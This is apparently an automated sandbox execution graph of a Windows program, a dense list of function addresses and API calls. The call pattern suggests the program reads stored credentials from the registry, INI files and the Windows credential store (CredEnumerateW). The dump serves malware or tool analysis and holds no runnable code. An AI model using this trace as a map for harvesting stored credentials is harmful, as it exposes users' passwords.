                                                                                                                                                                                                                              execution_graph 33802 40fc40 70 API calls 33975 403640 21 API calls 33803 427fa4 42 API calls 33976 412e43 _endthreadex 33977 425115 76 API calls __fprintf_l 33978 43fe40 133 API calls 33806 425115 83 API calls __fprintf_l 33807 401445 memcpy memcpy DialogBoxParamA 33808 440c40 34 API calls 32925 444c4a 32944 444e38 32925->32944 32927 444c56 GetModuleHandleA 32928 444c68 __set_app_type __p__fmode __p__commode 32927->32928 32930 444cfa 32928->32930 32931 444d02 __setusermatherr 32930->32931 32932 444d0e 32930->32932 32931->32932 32945 444e22 _controlfp 32932->32945 32934 444d13 _initterm __getmainargs _initterm 32935 444d6a GetStartupInfoA 32934->32935 32937 444d9e GetModuleHandleA 32935->32937 32946 40cf44 32937->32946 32941 444dcf _cexit 32943 444e04 32941->32943 32942 444dc8 exit 32942->32941 32944->32927 32945->32934 32997 404a99 LoadLibraryA 32946->32997 32948 40cf60 32949 40cf64 32948->32949 33004 410d0e 32948->33004 32949->32941 32949->32942 32951 40cf6f 33008 40ccd7 ??2@YAPAXI 32951->33008 32953 40cf9b 33022 407cbc 32953->33022 32958 40cfc4 33040 409825 memset 32958->33040 32959 40cfd8 33045 4096f4 memset 32959->33045 32964 40d181 ??3@YAXPAX 32966 40d1b3 32964->32966 32967 40d19f DeleteObject 32964->32967 32965 407e30 _strcmpi 32968 40cfee 32965->32968 33069 407948 free free 32966->33069 32967->32966 32970 40cff2 RegDeleteKeyA 32968->32970 32971 40d007 EnumResourceTypesA 32968->32971 32970->32964 32973 40d047 32971->32973 32974 40d02f MessageBoxA 32971->32974 32972 40d1c4 33070 4080d4 free 32972->33070 32976 40d0a0 CoInitialize 32973->32976 33050 40ce70 32973->33050 32974->32964 33067 40cc26 strncat memset RegisterClassA CreateWindowExA 32976->33067 32978 40d1cd 33071 407948 free free 32978->33071 32980 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33068 40c256 PostMessageA 32980->33068 32984 40d061 ??3@YAXPAX 32984->32966 32987 40d084 DeleteObject 32984->32987 32985 40d09e 32985->32976 32987->32966 32989 40d0f9 GetMessageA 32990 40d17b CoUninitialize 32989->32990 32991 40d10d 32989->32991 32990->32964 32992 40d113 TranslateAccelerator 32991->32992 32994 40d145 IsDialogMessage 32991->32994 32995 40d139 IsDialogMessage 32991->32995 32992->32991 32993 40d16d GetMessageA 32992->32993 32993->32990 32993->32992 32994->32993 32996 40d157 TranslateMessage DispatchMessageA 32994->32996 32995->32993 32995->32994 32996->32993 32998 404ac4 GetProcAddress 32997->32998 33000 404ae8 32997->33000 32999 404add FreeLibrary 32998->32999 33001 404ad4 32998->33001 32999->33000 33002 404b13 33000->33002 33003 404afc MessageBoxA 33000->33003 33001->32999 33002->32948 33003->32948 33005 410d17 LoadLibraryA 33004->33005 33006 410d3c 33004->33006 33005->33006 33007 410d2b GetProcAddress 33005->33007 33006->32951 33007->33006 33009 40cd08 ??2@YAPAXI 33008->33009 33011 40cd26 33009->33011 33012 40cd2d 33009->33012 33079 404025 6 API calls 33011->33079 33014 40cd66 33012->33014 33015 40cd59 DeleteObject 33012->33015 33072 407088 33014->33072 33015->33014 33017 40cd6b 33075 4019b5 33017->33075 33020 4019b5 strncat 33021 40cdbf _mbscpy 33020->33021 33021->32953 33081 407948 free free 33022->33081 33026 407a1f malloc memcpy free free 33029 407cf7 33026->33029 33027 407ddc 33035 407e04 33027->33035 33094 407a1f 33027->33094 33029->33026 33029->33027 33030 407d7a free 33029->33030 33029->33035 33085 40796e 7 API calls 33029->33085 33086 406f30 33029->33086 33030->33029 33082 407a55 33035->33082 33036 407e30 33037 407e57 33036->33037 33038 407e38 33036->33038 33037->32958 33037->32959 33038->33037 33039 407e41 _strcmpi 33038->33039 33039->33037 33039->33038 33100 4097ff 33040->33100 33042 409854 33105 409731 33042->33105 33046 4097ff 3 API calls 33045->33046 33047 409723 33046->33047 33125 40966c 33047->33125 33139 4023b2 33050->33139 33056 40ced3 33228 40cdda 7 API calls 33056->33228 33057 40cece 33061 40cf3f 33057->33061 33180 40c3d0 memset GetModuleFileNameA strrchr 33057->33180 33061->32984 33061->32985 33063 40ceed 33207 40affa 33063->33207 33067->32980 33068->32989 33069->32972 33070->32978 33071->32949 33080 406fc7 memset _mbscpy 33072->33080 33074 40709f CreateFontIndirectA 33074->33017 33076 4019e1 33075->33076 33077 4019c2 strncat 33076->33077 33078 4019e5 memset LoadIconA 33076->33078 33077->33076 33078->33020 33079->33012 33080->33074 33081->33029 33083 407a65 33082->33083 33084 407a5b free 33082->33084 33083->33036 33084->33083 33085->33029 33087 406f37 malloc 33086->33087 33088 406f7d 33086->33088 33090 406f73 33087->33090 33091 406f58 33087->33091 33088->33029 33090->33029 33092 406f6c free 33091->33092 33093 406f5c memcpy 33091->33093 33092->33090 33093->33092 33095 407a38 33094->33095 33096 407a2d free 33094->33096 33098 406f30 3 API calls 33095->33098 33097 407a43 33096->33097 33099 40796e 7 API calls 33097->33099 33098->33097 33099->33035 33116 406f96 GetModuleFileNameA 33100->33116 33102 409805 strrchr 33103 409814 33102->33103 33104 409817 _mbscat 33102->33104 33103->33104 33104->33042 33117 44b090 33105->33117 33110 40930c 3 API calls 33111 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33110->33111 33112 4097c5 LoadStringA 33111->33112 33115 4097db 33112->33115 33114 4097f3 33114->32964 33115->33112 33115->33114 33124 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33115->33124 33116->33102 33118 40973e _mbscpy _mbscpy 33117->33118 33119 40930c 33118->33119 33120 44b090 33119->33120 33121 409319 memset GetPrivateProfileStringA 33120->33121 33122 409374 33121->33122 33123 409364 WritePrivateProfileStringA 33121->33123 33122->33110 33123->33122 33124->33115 33135 406f81 GetFileAttributesA 33125->33135 33127 409675 33128 4096ee 33127->33128 33129 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33127->33129 33128->32965 33136 409278 GetPrivateProfileStringA 33129->33136 33131 4096c9 33137 409278 GetPrivateProfileStringA 33131->33137 33133 4096da 33138 409278 GetPrivateProfileStringA 33133->33138 33135->33127 33136->33131 33137->33133 33138->33128 33230 409c1c 33139->33230 33142 401e69 memset 33269 410dbb 33142->33269 33145 401ec2 33299 4070e3 strlen _mbscat _mbscpy _mbscat 33145->33299 33146 401ed4 33284 406f81 GetFileAttributesA 33146->33284 33149 401ee6 strlen strlen 33151 401f15 33149->33151 33152 401f28 33149->33152 33300 4070e3 strlen _mbscat _mbscpy _mbscat 33151->33300 33285 406f81 GetFileAttributesA 33152->33285 33155 401f35 33286 401c31 33155->33286 33158 401f75 33298 410a9c RegOpenKeyExA 33158->33298 33160 401c31 7 API calls 33160->33158 33161 401f91 33162 402187 33161->33162 33163 401f9c memset 33161->33163 33165 402195 ExpandEnvironmentStringsA 33162->33165 33166 4021a8 _strcmpi 33162->33166 33301 410b62 RegEnumKeyExA 33163->33301 33310 406f81 GetFileAttributesA 33165->33310 33166->33056 33166->33057 33168 40217e RegCloseKey 33168->33162 33169 401fd9 atoi 33170 401fef memset memset sprintf 33169->33170 33175 401fc9 33169->33175 33302 410b1e 33170->33302 33173 402165 33173->33168 33174 402076 memset memset strlen strlen 33174->33175 33175->33168 33175->33169 33175->33173 33175->33174 33176 4020dd strlen strlen 33175->33176 33177 4070e3 strlen _mbscat _mbscpy _mbscat 33175->33177 33178 406f81 GetFileAttributesA 33175->33178 33179 402167 _mbscpy 33175->33179 33309 410b62 RegEnumKeyExA 33175->33309 33176->33175 33177->33175 33178->33175 33179->33168 33181 40c422 33180->33181 33182 40c425 _mbscat _mbscpy _mbscpy 33180->33182 33181->33182 33183 40c49d 33182->33183 33184 40c512 33183->33184 33185 40c502 GetWindowPlacement 33183->33185 33186 40c538 33184->33186 33331 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33184->33331 33185->33184 33324 409b31 33186->33324 33190 40ba28 33191 40ba87 33190->33191 33197 40ba3c 33190->33197 33334 406c62 LoadCursorA SetCursor 33191->33334 33193 40ba8c 33335 404734 33193->33335 33343 403c16 33193->33343 33419 404785 33193->33419 33422 410a9c RegOpenKeyExA 33193->33422 33423 4107f1 33193->33423 33194 40ba43 _mbsicmp 33194->33197 33195 40baa0 33196 407e30 _strcmpi 33195->33196 33200 40bab0 33196->33200 33197->33191 33197->33194 33426 40b5e5 10 API calls 33197->33426 33198 40bafa SetCursor 33198->33063 33200->33198 33201 40baf1 qsort 33200->33201 33201->33198 33786 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33207->33786 33209 40b00e 33210 40b016 33209->33210 33211 40b01f GetStdHandle 33209->33211 33787 406d1a CreateFileA 33210->33787 33213 40b01c 33211->33213 33214 40b035 33213->33214 33215 40b12d 33213->33215 33788 406c62 LoadCursorA SetCursor 33214->33788 33792 406d77 9 API calls 33215->33792 33218 40b136 33229 40c580 28 API calls 33218->33229 33219 40b087 33226 40b0a1 33219->33226 33790 40a699 12 API calls 33219->33790 33220 40b042 33220->33219 33220->33226 33789 40a57c strlen WriteFile 33220->33789 33223 40b0d6 33224 40b116 CloseHandle 33223->33224 33225 40b11f SetCursor 33223->33225 33224->33225 33225->33218 33226->33223 33791 406d77 9 API calls 33226->33791 33228->33057 33229->33061 33242 409a32 33230->33242 33233 409c80 memcpy memcpy 33237 409cda 33233->33237 33234 409d18 ??2@YAPAXI ??2@YAPAXI 33236 409d54 ??2@YAPAXI 33234->33236 33239 409d8b 33234->33239 33235 408db6 12 API calls 33235->33237 33236->33239 33237->33233 33237->33234 33237->33235 33239->33239 33252 409b9c 33239->33252 33241 4023c1 33241->33142 33243 409a44 33242->33243 33244 409a3d ??3@YAXPAX 33242->33244 33245 409a52 33243->33245 33246 409a4b ??3@YAXPAX 33243->33246 33244->33243 33247 409a5c ??3@YAXPAX 33245->33247 33249 409a63 33245->33249 33246->33245 33247->33249 33248 409a83 ??2@YAPAXI ??2@YAPAXI 33248->33233 33249->33248 33250 409a73 ??3@YAXPAX 33249->33250 33251 409a7c ??3@YAXPAX 33249->33251 33250->33251 33251->33248 33253 407a55 free 33252->33253 33254 409ba5 33253->33254 33255 407a55 free 33254->33255 33256 409bad 33255->33256 33257 407a55 free 33256->33257 33258 409bb5 33257->33258 33259 407a55 free 33258->33259 33260 409bbd 33259->33260 33261 407a1f 4 API calls 33260->33261 33262 409bd0 33261->33262 33263 407a1f 4 API calls 33262->33263 33264 409bda 33263->33264 33265 407a1f 4 API calls 33264->33265 33266 409be4 33265->33266 33267 407a1f 4 API calls 33266->33267 33268 409bee 33267->33268 33268->33241 33270 410d0e 2 API calls 33269->33270 33271 410dca 33270->33271 33272 410dfd memset 33271->33272 33311 4070ae 33271->33311 33274 410e1d 33272->33274 33314 410a9c RegOpenKeyExA 33274->33314 33277 401e9e strlen strlen 33277->33145 33277->33146 33278 410e4a 33279 410e7f _mbscpy 33278->33279 33315 410d3d _mbscpy 33278->33315 33279->33277 33281 410e5b 33316 410add RegQueryValueExA 33281->33316 33283 410e73 RegCloseKey 33283->33279 33284->33149 33285->33155 33317 410a9c RegOpenKeyExA 33286->33317 33288 401c4c 33289 401cad 33288->33289 33318 410add RegQueryValueExA 33288->33318 33289->33158 33289->33160 33291 401c6a 33292 401c71 strchr 33291->33292 33293 401ca4 RegCloseKey 33291->33293 33292->33293 33294 401c85 strchr 33292->33294 33293->33289 33294->33293 33295 401c94 33294->33295 33319 406f06 strlen 33295->33319 33297 401ca1 33297->33293 33298->33161 33299->33146 33300->33152 33301->33175 33322 410a9c RegOpenKeyExA 33302->33322 33304 410b34 33305 410b5d 33304->33305 33323 410add RegQueryValueExA 33304->33323 33305->33175 33307 410b4c RegCloseKey 33307->33305 33309->33175 33310->33166 33312 4070bd GetVersionExA 33311->33312 33313 4070ce 33311->33313 33312->33313 33313->33272 33313->33277 33314->33278 33315->33281 33316->33283 33317->33288 33318->33291 33320 406f17 33319->33320 33321 406f1a memcpy 33319->33321 33320->33321 33321->33297 33322->33304 33323->33307 33325 409b40 33324->33325 33327 409b4e 33324->33327 33332 409901 memset SendMessageA 33325->33332 33328 409b99 33327->33328 33329 409b8b 33327->33329 33328->33190 33333 409868 SendMessageA 33329->33333 33331->33186 33332->33327 33333->33328 33334->33193 33336 404785 FreeLibrary 33335->33336 33337 40473b LoadLibraryA 33336->33337 33338 40474c GetProcAddress 33337->33338 33339 40476e 33337->33339 33338->33339 33341 404764 33338->33341 33340 404781 33339->33340 33342 404785 FreeLibrary 33339->33342 33340->33195 33341->33339 33342->33340 33344 4107f1 FreeLibrary 33343->33344 33345 403c30 LoadLibraryA 33344->33345 33346 403c74 33345->33346 33347 403c44 GetProcAddress 33345->33347 33348 4107f1 FreeLibrary 33346->33348 33347->33346 33349 403c5e 33347->33349 33350 403c7b 33348->33350 33349->33346 33352 403c6b 33349->33352 33351 404734 3 API calls 33350->33351 33353 403c86 33351->33353 33352->33350 33427 4036e5 33353->33427 33356 4036e5 27 API calls 33357 403c9a 33356->33357 33358 4036e5 27 API calls 33357->33358 33359 403ca4 33358->33359 33360 4036e5 27 API calls 33359->33360 33361 403cae 33360->33361 33439 4085d2 33361->33439 33369 403ce5 33370 403cf7 33369->33370 33622 402bd1 40 API calls 33369->33622 33487 410a9c RegOpenKeyExA 33370->33487 33373 403d0a 33374 403d1c 33373->33374 33623 402bd1 40 API calls 33373->33623 33488 402c5d 33374->33488 33378 4070ae GetVersionExA 33379 403d31 33378->33379 33506 410a9c RegOpenKeyExA 33379->33506 33381 403d51 33383 403d61 33381->33383 33624 402b22 47 API calls 33381->33624 33507 410a9c RegOpenKeyExA 33383->33507 33385 403d87 33386 403d97 33385->33386 33625 402b22 47 API calls 33385->33625 33508 410a9c RegOpenKeyExA 33386->33508 33389 403dbd 33390 403dcd 33389->33390 33626 402b22 47 API calls 33389->33626 33509 410808 33390->33509 33394 404785 FreeLibrary 33395 403de8 33394->33395 33513 402fdb 33395->33513 33398 402fdb 34 API calls 33399 403e00 33398->33399 33529 4032b7 33399->33529 33408 403e3b 33410 403e73 33408->33410 33411 403e46 _mbscpy 33408->33411 33576 40fb00 33410->33576 33628 40f334 334 API calls 33411->33628 33420 4047a3 33419->33420 33421 404799 FreeLibrary 33419->33421 33420->33195 33421->33420 33422->33195 33424 410807 33423->33424 33425 4107fc FreeLibrary 33423->33425 33424->33195 33425->33424 33426->33197 33428 4037c5 33427->33428 33429 4036fb 33427->33429 33428->33356 33629 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33429->33629 33431 40370e 33431->33428 33432 403716 strchr 33431->33432 33432->33428 33433 403730 33432->33433 33630 4021b6 memset 33433->33630 33435 40373f _mbscpy _mbscpy strlen 33436 4037a4 _mbscpy 33435->33436 33437 403789 sprintf 33435->33437 33631 4023e5 16 API calls 33436->33631 33437->33436 33440 4085e2 33439->33440 33632 4082cd 11 API calls 33440->33632 33444 408600 33445 403cba 33444->33445 33446 40860b memset 33444->33446 33457 40821d 33445->33457 33635 410b62 RegEnumKeyExA 33446->33635 33448 4086d2 RegCloseKey 33448->33445 33450 408637 33450->33448 33451 40865c memset 33450->33451 33636 410a9c RegOpenKeyExA 33450->33636 33639 410b62 RegEnumKeyExA 33450->33639 33637 410add RegQueryValueExA 33451->33637 33454 408694 33638 40848b 10 API calls 33454->33638 33456 4086ab RegCloseKey 33456->33450 33640 410a9c RegOpenKeyExA 33457->33640 33459 40823f 33460 403cc6 33459->33460 33461 408246 memset 33459->33461 33469 4086e0 33460->33469 33641 410b62 RegEnumKeyExA 33461->33641 33463 4082bf RegCloseKey 33463->33460 33465 40826f 33465->33463 33642 410a9c RegOpenKeyExA 33465->33642 33643 4080ed 11 API calls 33465->33643 33644 410b62 RegEnumKeyExA 33465->33644 33468 4082a2 RegCloseKey 33468->33465 33645 4045db 33469->33645 33471 4088ef 33653 404656 33471->33653 33474 40872d 33474->33471 33476 408737 wcslen 33474->33476 33476->33471 33483 40876a 33476->33483 33477 40872b CredEnumerateW 33477->33474 33478 40877a wcsncmp 33478->33483 33480 404734 3 API calls 33480->33483 33481 404785 FreeLibrary 33481->33483 33482 408812 memset 33482->33483 33484 40883c memcpy wcschr 33482->33484 33483->33471 33483->33478 33483->33480 33483->33481 33483->33482 33483->33484 33485 4088c3 LocalFree 33483->33485 33656 40466b _mbscpy 33483->33656 33484->33483 33485->33483 33486 410a9c RegOpenKeyExA 33486->33369 33487->33373 33657 410a9c RegOpenKeyExA 33488->33657 33490 402c7a 33491 402da5 33490->33491 33492 402c87 memset 33490->33492 33491->33378 33658 410b62 RegEnumKeyExA 33492->33658 33494 402d9c RegCloseKey 33494->33491 33495 410b1e 3 API calls 33496 402ce4 memset sprintf 33495->33496 33659 410a9c RegOpenKeyExA 33496->33659 33498 402d3a sprintf 33661 410a9c RegOpenKeyExA 33498->33661 33499 402d28 33499->33498 33660 402bd1 40 API calls 33499->33660 33504 402cb2 33504->33494 33504->33495 33505 402d9a 33504->33505 33662 402bd1 40 API calls 33504->33662 33663 410b62 RegEnumKeyExA 33504->33663 33505->33494 33506->33381 33507->33385 33508->33389 33511 410816 33509->33511 33510 4107f1 FreeLibrary 33512 403ddd 33510->33512 33511->33510 33512->33394 33664 410a9c RegOpenKeyExA 33513->33664 33515 402ff9 33516 403006 memset 33515->33516 33517 40312c 33515->33517 33665 410b62 RegEnumKeyExA 33516->33665 33517->33398 33519 403122 RegCloseKey 33519->33517 33520 403033 33520->33519 33521 410b1e 3 API calls 33520->33521 33524 4030a2 memset 33520->33524 33526 4030f9 RegCloseKey 33520->33526 33528 410b62 RegEnumKeyExA 33520->33528 33668 402db3 26 API calls 33520->33668 33522 403058 memset sprintf 33521->33522 33666 410a9c RegOpenKeyExA 33522->33666 33667 410b62 RegEnumKeyExA 33524->33667 33526->33520 33528->33520 33530 4032d5 33529->33530 33531 4033a9 33529->33531 33669 4021b6 memset 33530->33669 33544 4034e4 memset memset 33531->33544 33533 4032e1 33670 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33533->33670 33535 4032ea 33536 4032f8 memset GetPrivateProfileSectionA 33535->33536 33671 4023e5 16 API calls 33535->33671 33536->33531 33541 40332f 33536->33541 33538 40339b strlen 33538->33531 33538->33541 33540 403350 strchr 33540->33541 33541->33531 33541->33538 33672 4021b6 memset 33541->33672 33673 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33541->33673 33674 4023e5 16 API calls 33541->33674 33545 410b1e 3 API calls 33544->33545 33546 40353f 33545->33546 33547 40357f 33546->33547 33548 403546 _mbscpy 33546->33548 33552 403985 33547->33552 33675 406d55 strlen _mbscat 33548->33675 33550 403565 _mbscat 33676 4033f0 19 API calls 33550->33676 33677 40466b _mbscpy 33552->33677 33554 4039aa 33558 4039ff 33554->33558 33678 40f460 memset memset 33554->33678 33699 40f6e2 33554->33699 33715 4038e8 21 API calls 33554->33715 33559 404785 FreeLibrary 33558->33559 33560 403a0b 33559->33560 33561 4037ca memset memset 33560->33561 33723 444551 memset 33561->33723 33564 4038e2 33564->33408 33627 40f334 334 API calls 33564->33627 33566 40382e 33567 406f06 2 API calls 33566->33567 33568 403843 33567->33568 33569 406f06 2 API calls 33568->33569 33570 403855 strchr 33569->33570 33571 403884 _mbscpy 33570->33571 33572 403897 strlen 33570->33572 33573 4038bf _mbscpy 33571->33573 33572->33573 33574 4038a4 sprintf 33572->33574 33735 4023e5 16 API calls 33573->33735 33574->33573 33577 44b090 33576->33577 33578 40fb10 RegOpenKeyExA 33577->33578 33579 403e7f 33578->33579 33580 40fb3b RegOpenKeyExA 33578->33580 33590 40f96c 33579->33590 33581 40fb55 RegQueryValueExA 33580->33581 33582 40fc2d RegCloseKey 33580->33582 33583 40fc23 RegCloseKey 33581->33583 33584 40fb84 33581->33584 33582->33579 33583->33582 33585 404734 3 API calls 33584->33585 33586 40fb91 33585->33586 33586->33583 33587 40fc19 LocalFree 33586->33587 33588 40fbdd memcpy memcpy 33586->33588 33587->33583 33740 40f802 11 API calls 33588->33740 33591 4070ae GetVersionExA 33590->33591 33592 40f98d 33591->33592 33593 4045db 7 API calls 33592->33593 33601 40f9a9 33593->33601 33594 40fae6 33595 404656 FreeLibrary 33594->33595 33596 403e85 33595->33596 33602 4442ea memset 33596->33602 33597 40fa13 memset WideCharToMultiByte 33598 40fa43 _strnicmp 33597->33598 33597->33601 33599 40fa5b WideCharToMultiByte 33598->33599 33598->33601 33600 40fa88 WideCharToMultiByte 33599->33600 33599->33601 33600->33601 33601->33594 33601->33597 33603 410dbb 9 API calls 33602->33603 33604 444329 33603->33604 33741 40759e strlen strlen 33604->33741 33609 410dbb 9 API calls 33610 444350 33609->33610 33611 40759e 3 API calls 33610->33611 33612 44435a 33611->33612 33613 444212 65 API calls 33612->33613 33614 444366 memset memset 33613->33614 33615 410b1e 3 API calls 33614->33615 33616 4443b9 ExpandEnvironmentStringsA strlen 33615->33616 33617 4443f4 _strcmpi 33616->33617 33618 4443e5 33616->33618 33619 403e91 33617->33619 33620 44440c 33617->33620 33618->33617 33619->33195 33621 444212 65 API calls 33620->33621 33621->33619 33622->33370 33623->33374 33624->33383 33625->33386 33626->33390 33627->33408 33628->33410 33629->33431 33630->33435 33631->33428 33633 40841c 33632->33633 33634 410a9c RegOpenKeyExA 33633->33634 33634->33444 33635->33450 33636->33450 33637->33454 33638->33456 33639->33450 33640->33459 33641->33465 33642->33465 33643->33468 33644->33465 33646 404656 FreeLibrary 33645->33646 33647 4045e3 LoadLibraryA 33646->33647 33648 404651 33647->33648 33649 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33647->33649 33648->33471 33648->33474 33648->33477 33650 40463d 33649->33650 33651 404643 33650->33651 33652 404656 FreeLibrary 33650->33652 33651->33648 33652->33648 33654 403cd2 33653->33654 33655 40465c FreeLibrary 33653->33655 33654->33486 33655->33654 33656->33483 33657->33490 33658->33504 33659->33499 33660->33498 33661->33504 33662->33504 33663->33504 33664->33515 33665->33520 33666->33520 33667->33520 33668->33520 33669->33533 33670->33535 33671->33536 33672->33540 33673->33541 33674->33541 33675->33550 33676->33547 33677->33554 33716 4078ba 33678->33716 33681 4078ba _mbsnbcat 33682 40f5a3 RegOpenKeyExA 33681->33682 33683 40f5c3 RegQueryValueExA 33682->33683 33684 40f6d9 33682->33684 33685 40f6d0 RegCloseKey 33683->33685 33686 40f5f0 33683->33686 33684->33554 33685->33684 33686->33685 33696 40f675 33686->33696 33720 40466b _mbscpy 33686->33720 33688 40f611 33690 404734 3 API calls 33688->33690 33695 40f616 33690->33695 33691 40f69e RegQueryValueExA 33691->33685 33692 40f6c1 33691->33692 33692->33685 33693 40f66a 33694 404785 FreeLibrary 33693->33694 33694->33696 33695->33693 33697 40f661 LocalFree 33695->33697 33698 40f645 memcpy 33695->33698 33696->33685 33721 4012ee strlen 33696->33721 33697->33693 33698->33697 33722 40466b _mbscpy 33699->33722 33701 40f6fa 33702 4045db 7 API calls 33701->33702 33703 40f708 33702->33703 33704 40f7e2 33703->33704 33705 404734 3 API calls 33703->33705 33706 404656 FreeLibrary 33704->33706 33710 40f715 33705->33710 33707 40f7f1 33706->33707 33708 404785 FreeLibrary 33707->33708 33709 40f7fc 33708->33709 33709->33554 33710->33704 33711 40f797 WideCharToMultiByte 33710->33711 33712 40f7b8 strlen 33711->33712 33713 40f7d9 LocalFree 33711->33713 33712->33713 33714 40f7c8 _mbscpy 33712->33714 33713->33704 33714->33713 33715->33554 33717 4078e6 33716->33717 33718 4078c7 _mbsnbcat 33717->33718 33719 4078ea 33717->33719 33718->33717 33719->33681 33720->33688 33721->33691 33722->33701 33736 410a9c RegOpenKeyExA 33723->33736 33725 40381a 33725->33564 33734 4021b6 memset 33725->33734 33726 44458b 33726->33725 33737 410add RegQueryValueExA 33726->33737 33728 4445a4 33729 4445dc RegCloseKey 33728->33729 33738 410add RegQueryValueExA 33728->33738 33729->33725 33731 4445c1 33731->33729 33739 444879 30 API calls 33731->33739 33733 4445da 33733->33729 33734->33566 33735->33564 33736->33726 33737->33728 33738->33731 33739->33733 33740->33587 33742 4075c9 33741->33742 33743 4075bb _mbscat 33741->33743 33744 444212 33742->33744 33743->33742 33761 407e9d 33744->33761 33747 44424d 33748 444274 33747->33748 33750 444258 33747->33750 33769 407ef8 33747->33769 33749 407e9d 9 API calls 33748->33749 33758 4442a0 33749->33758 33782 444196 52 API calls 33750->33782 33752 407ef8 9 API calls 33752->33758 33753 4442ce 33779 407f90 33753->33779 33757 407f90 FindClose 33759 4442e4 33757->33759 33758->33752 33758->33753 33760 444212 65 API calls 33758->33760 33783 407e62 strcmp strcmp 33758->33783 33759->33609 33760->33758 33762 407f90 FindClose 33761->33762 33763 407eaa 33762->33763 33764 406f06 2 API calls 33763->33764 33765 407ebd strlen strlen 33764->33765 33766 407ee1 33765->33766 33768 407eea 33765->33768 33784 4070e3 strlen _mbscat _mbscpy _mbscat 33766->33784 33768->33747 33770 407f03 FindFirstFileA 33769->33770 33771 407f24 FindNextFileA 33769->33771 33772 407f3f 33770->33772 33773 407f46 strlen strlen 33771->33773 33774 407f3a 33771->33774 33772->33773 33776 407f7f 33772->33776 33773->33776 33777 407f76 33773->33777 33775 407f90 FindClose 33774->33775 33775->33772 33776->33747 33785 4070e3 strlen _mbscat _mbscpy _mbscat 33777->33785 33780 407fa3 33779->33780 33781 407f99 FindClose 33779->33781 33780->33757 33781->33780 33782->33747 33783->33758 33784->33768 33785->33776 33786->33209 33787->33213 33788->33220 33789->33219 33790->33226 33791->33223 33792->33218 33810 411853 RtlInitializeCriticalSection memset 33811 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 33984 40a256 13 API calls 33986 432e5b 17 API calls 33988 43fa5a 20 API calls 33813 401060 41 API calls 33991 427260 CloseHandle memset memset 32902 410c68 FindResourceA 32903 410c81 SizeofResource 32902->32903 32906 410cae 32902->32906 32904 410c92 LoadResource 32903->32904 32903->32906 32905 410ca0 LockResource 32904->32905 32904->32906 32905->32906 33993 405e69 14 API calls 33818 433068 15 API calls __fprintf_l 33995 414a6d 18 API calls 33996 43fe6f 134 API calls 33820 424c6d 15 API calls __fprintf_l 33997 426741 19 API calls 33822 440c70 17 API calls 33823 443c71 44 API calls 33826 427c79 24 API calls 34000 416e7e memset __fprintf_l 33829 43f400 15 API calls 33830 42800b 47 API calls 33831 425115 82 API calls __fprintf_l 34003 41960c 61 API calls 33832 43f40c 122 API calls __fprintf_l 33835 411814 InterlockedCompareExchange RtlDeleteCriticalSection 33836 43f81a 20 API calls 33838 414c20 memset memset 33839 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34007 414625 18 API calls 34008 404225 modf 34009 403a26 strlen WriteFile 34011 40422a 12 API calls 34015 427632 memset memset memcpy 34016 40ca30 59 API calls 32889 44b435 VirtualProtect 32890 44b444 VirtualProtect 32889->32890 32891 44b454 32889->32891 32890->32891 34017 404235 26 API calls 33841 425115 76 API calls __fprintf_l 34018 425115 77 API calls __fprintf_l 34020 44223a 38 API calls 33847 43183c 112 API calls 34021 44b2c5 _onexit __dllonexit 34026 42a6d2 memcpy __allrem 33849 405cda 65 API calls 34034 43fedc 138 API calls 34035 4116e1 16 API calls __fprintf_l 33852 4244e6 19 API calls 33854 42e8e8 127 API calls __fprintf_l 33855 4118ee RtlLeaveCriticalSection 34040 43f6ec 22 API calls 33857 425115 119 API calls __fprintf_l 32892 410cf3 EnumResourceNamesA 34043 4492f0 memcpy memcpy 34045 43fafa 18 API calls 34047 4342f9 15 API calls __fprintf_l 33858 4144fd 19 API calls 34049 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34050 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34053 443a84 _mbscpy 34055 43f681 17 API calls 33861 404487 22 API calls 34057 415e8c 16 API calls __fprintf_l 33865 411893 RtlDeleteCriticalSection __fprintf_l 33866 41a492 42 API calls 34061 403e96 34 API calls 34062 410e98 memset SHGetPathFromIDList SendMessageA 33868 426741 109 API calls __fprintf_l 33869 4344a2 18 API calls 33870 4094a2 10 API calls 34065 4116a6 15 API calls __fprintf_l 34066 43f6a4 17 API calls 34067 440aa3 20 API calls 34069 427430 45 API calls 33873 4090b0 7 API calls 33874 4148b0 15 API calls 33876 4118b4 RtlEnterCriticalSection 33877 4014b7 CreateWindowExA 33878 40c8b8 19 API calls 33880 4118bf RtlTryEnterCriticalSection 34074 42434a 18 API calls __fprintf_l 34076 405f53 12 API calls 33888 43f956 59 API calls 33890 40955a 17 API calls 33891 428561 36 API calls 33892 409164 7 API calls 34080 404366 19 API calls 34084 40176c ExitProcess 34087 410777 42 API calls 33897 40dd7b 51 API calls 33898 425d7c 16 API calls __fprintf_l 34089 43f6f0 25 API calls 34090 42db01 22 API calls 33899 412905 15 API calls __fprintf_l 34091 403b04 54 API calls 34092 405f04 SetDlgItemTextA GetDlgItemTextA 34093 44b301 ??3@YAXPAX 34096 4120ea 14 API calls 3 library calls 34097 40bb0a 8 API calls 34099 413f11 strcmp 33903 434110 17 API calls __fprintf_l 33905 425115 108 API calls __fprintf_l 34100 444b11 _onexit 33907 425115 76 API calls __fprintf_l 33910 429d19 10 API calls 34103 444b1f __dllonexit 34104 409f20 _strcmpi 33912 42b927 31 API calls 34107 433f26 19 API calls __fprintf_l 34108 44b323 FreeLibrary 34109 427f25 46 API calls 34110 43ff2b 17 API calls 34111 43fb30 19 API calls 33919 414d36 16 API calls 33921 40ad38 7 API calls 34113 433b38 16 API calls __fprintf_l 33793 44b33b 33794 44b344 ??3@YAXPAX 33793->33794 33795 44b34b 33793->33795 33794->33795 33796 44b354 ??3@YAXPAX 33795->33796 33797 44b35b 33795->33797 33796->33797 